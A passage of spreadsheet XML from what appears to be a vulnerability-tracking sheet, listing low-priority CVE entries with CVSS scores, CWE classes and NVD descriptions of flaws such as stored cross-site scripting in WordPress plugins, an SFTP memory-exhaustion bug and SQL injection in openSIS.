          <t>HCL Digital Experience is affected by improper input sanitation.  This can result in HTML injection which could be leveraged in content spoofing from a trusted domain. Apply HCL Digital Experience 9.5 CF238 or later to address this.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67075</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91109</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>The Simply Schedule Appointments plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.6.12.31 via the 'complete_group' parameter due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with subscriber-level access and above, to disclose every co-booker's private per-appointment id_token (exposed as public_token) alongside their PII (name and email address), then use each leaked token to read, overwrite arbitrary appointment meta on, or cancel the co-booker's appointment via the same REST controller. Exploitation requires the attacker to possess a valid id_token for any single appointment within the targeted group booking.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91109</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94029</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr">
        <is>
          <t>openssh</t>
        </is>
      </c>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>Server-side memory exhaustion in Apache MINA SSHD 1.0.0 to 2.19.0 and 3.0.0-M1 to 3.0.0-M5, component sshd-sftp, in the SFTP v6 check-file-name/check-file-handle extension. Apache MINA SSHD is a Java library for client-side and server-side SSH.
Using a very small "block size" (for instance 256, which is the minimum) on a huge file generates many (file size / block size) hashes. The resulting SFTP reply message was accumulated fully in memory server-side, which could, with a suitably large (possibly sparse) file exhaust the server-side memory, taking down the server.
Users are recommended to upgrade to version 2.20.0 or 3.0.0-M6, which fix this issue by imposing a maximum limit on the size of the reply. Many SFTP implementations have a general limit on the size of SFTP messages anyway; typically 256kB as in OpenSSH or also in Apache MINA SSHD.</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94029</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97265</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>6.5</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Crocoblock. Jetimpex Inc. JetEngine allows Stored XSS.
This issue affects JetEngine: from n/a through 3.8.15.3.</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97265</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-14564</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>The Viable URL Media Uploader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T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-14564</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11895</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P119" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q119" s="5" t="inlineStr"/>
      <c r="R119" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S119" s="5" t="inlineStr">
        <is>
          <t>The HT Mega Addons for Elementor – Elementor Widgets &amp; Template Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Data Table 'display_options' Setting in all versions up to, and including, 3.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T119" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11895</t>
        </is>
      </c>
    </row>
    <row r="120">
      <c r="A120" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B120" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C120" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-14876</t>
        </is>
      </c>
      <c r="D120" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E120" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F120" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G120" s="5" t="inlineStr"/>
      <c r="H120" s="5" t="inlineStr"/>
      <c r="I120" s="5" t="inlineStr"/>
      <c r="J120" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K120" s="5" t="inlineStr"/>
      <c r="L120" s="5" t="inlineStr"/>
      <c r="M120" s="5" t="inlineStr"/>
      <c r="N120" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O120" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P120" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q120" s="5" t="inlineStr"/>
      <c r="R120" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S120" s="5" t="inlineStr">
        <is>
          <t>The Smart Slider 3 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data-href' parameter in all versions up to, and including, 3.5.1.38 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T120" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-14876</t>
        </is>
      </c>
    </row>
    <row r="121">
      <c r="A121" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B121" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C121" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6170</t>
        </is>
      </c>
      <c r="D121" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E121" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F121" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G121" s="5" t="inlineStr"/>
      <c r="H121" s="5" t="inlineStr"/>
      <c r="I121" s="5" t="inlineStr"/>
      <c r="J121" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K121" s="5" t="inlineStr"/>
      <c r="L121" s="5" t="inlineStr"/>
      <c r="M121" s="5" t="inlineStr"/>
      <c r="N121" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O121" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P121" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q121" s="5" t="inlineStr"/>
      <c r="R121" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S121" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'images' parameter of the plugin's bt_bb_css_image_grid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121" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6170</t>
        </is>
      </c>
    </row>
    <row r="122">
      <c r="A122" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B122" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C122" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6171</t>
        </is>
      </c>
      <c r="D122" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E122" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F122" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G122" s="5" t="inlineStr"/>
      <c r="H122" s="5" t="inlineStr"/>
      <c r="I122" s="5" t="inlineStr"/>
      <c r="J122" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K122" s="5" t="inlineStr"/>
      <c r="L122" s="5" t="inlineStr"/>
      <c r="M122" s="5" t="inlineStr"/>
      <c r="N122" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O122" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P122" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q122" s="5" t="inlineStr"/>
      <c r="R122" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S122" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'target' parameter of the plugin's bt_bb_icon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122" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6171</t>
        </is>
      </c>
    </row>
    <row r="123">
      <c r="A123" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B123" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C123" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6172</t>
        </is>
      </c>
      <c r="D123" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E123" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F123" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G123" s="5" t="inlineStr"/>
      <c r="H123" s="5" t="inlineStr"/>
      <c r="I123" s="5" t="inlineStr"/>
      <c r="J123" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K123" s="5" t="inlineStr"/>
      <c r="L123" s="5" t="inlineStr"/>
      <c r="M123" s="5" t="inlineStr"/>
      <c r="N123" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O123" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P123" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q123" s="5" t="inlineStr"/>
      <c r="R123" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S123" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'caption' parameter of the plugin's bt_bb_image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123" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6172</t>
        </is>
      </c>
    </row>
    <row r="124">
      <c r="A124" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B124" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C124" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-6173</t>
        </is>
      </c>
      <c r="D124" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E124" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F124" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G124" s="5" t="inlineStr"/>
      <c r="H124" s="5" t="inlineStr"/>
      <c r="I124" s="5" t="inlineStr"/>
      <c r="J124" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K124" s="5" t="inlineStr"/>
      <c r="L124" s="5" t="inlineStr"/>
      <c r="M124" s="5" t="inlineStr"/>
      <c r="N124" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O124" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P124" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q124" s="5" t="inlineStr"/>
      <c r="R124" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S124" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'background_image' parameter of the plugin's bt_bb_section shortcode in all versions up to, and including, 5.7.2 due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.</t>
        </is>
      </c>
      <c r="T124" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-6173</t>
        </is>
      </c>
    </row>
    <row r="125">
      <c r="A125" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B125" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C125" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88037</t>
        </is>
      </c>
      <c r="D125" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E125" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F125" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G125" s="5" t="inlineStr"/>
      <c r="H125" s="5" t="inlineStr"/>
      <c r="I125" s="5" t="inlineStr"/>
      <c r="J125" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K125" s="5" t="inlineStr"/>
      <c r="L125" s="5" t="inlineStr"/>
      <c r="M125" s="5" t="inlineStr"/>
      <c r="N125" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O125" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P125" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q125" s="5" t="inlineStr"/>
      <c r="R125" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S125" s="5" t="inlineStr">
        <is>
          <t>The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `title` attribute of the `bt_bb_service` shortcode in all versions up to, and including, 5.7.2.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T125" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88037</t>
        </is>
      </c>
    </row>
    <row r="126">
      <c r="A126" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B126" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C126" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92712</t>
        </is>
      </c>
      <c r="D126" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E126" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F126" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G126" s="5" t="inlineStr"/>
      <c r="H126" s="5" t="inlineStr"/>
      <c r="I126" s="5" t="inlineStr"/>
      <c r="J126" s="5" t="inlineStr">
        <is>
          <t>react, gin</t>
        </is>
      </c>
      <c r="K126" s="5" t="inlineStr"/>
      <c r="L126" s="5" t="inlineStr"/>
      <c r="M126" s="5" t="inlineStr"/>
      <c r="N126" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O126" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P126" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S126" s="5" t="inlineStr">
        <is>
          <t>The ReactPress – Create React App for WordPress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'permalink' parameter in all versions up to, and including, 3.4.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This is possible because the permalink parameter is only passed through sanitize_url(), which does not prevent fetching attacker-controlled remote URLs whose response body — including script tags and event-handler attributes — is written verbatim to disk via file_put_contents().</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92712</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93908</t>
        </is>
      </c>
      <c r="D127" s="5" t="n">
        <v>6.4</v>
      </c>
      <c r="E127" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F127" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr"/>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S127" s="5" t="inlineStr">
        <is>
          <t>The Real Estate Manager – Property Listing and Agent Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'before_price_text' parameter in all versions up to, and including, 7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The vulnerability is further enabled by the absence of any capability, nonce, or ownership check on the wp_ajax_rem_create_pro_ajax handler, and because the value is persisted via update_post_meta rather than post_content, the wp_kses filtering tied to the unfiltered_html capability does not apply.</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93908</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102983</t>
        </is>
      </c>
      <c r="D128" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E128" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F128" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr">
        <is>
          <t>npm:@astrojs/netlify</t>
        </is>
      </c>
      <c r="M128" s="5" t="inlineStr">
        <is>
          <t>8.2.4</t>
        </is>
      </c>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr">
        <is>
          <t>CWE-625, CWE-918</t>
        </is>
      </c>
      <c r="S128" s="5" t="inlineStr">
        <is>
          <t>Astro is a web framework for content-driven websites. From 5.2.0 until 8.2.4, the @astrojs/netlify adapter generates regular expressions for Netlify Image CDN remote-image allowlists without anchoring them to the beginning of the URL. Because Netlify evaluates these expressions with RegExp.test(), an allowed origin appearing only in a source URL's path or query can satisfy image.domains or image.remotePatterns while the URL's actual host remains attacker-controlled. An unauthenticated request to the public /.netlify/images endpoint can therefore cause the Image CDN to request attacker-selected URLs and may probe or reach internal services. Netlify egress protections may constrain reachable targets, and image transformation limits direct response exfiltration; no confidentiality or integrity impact has been demonstrated. This issue is fixed in version 8.2.4.</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102983</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103115</t>
        </is>
      </c>
      <c r="D129" s="5" t="n">
        <v>6.3</v>
      </c>
      <c r="E129" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr"/>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in OS4ED openSIS-Classic up to 9.3. This affects an unknown function of the file functions/CustomFieldsFnc.php of the component Student Search. The manipulation of the argument cust results in sql injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103115</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103222</t>
        </is>
      </c>
      <c r="D130" s="5" t="n">
        <v>6.3</v>
      </c>
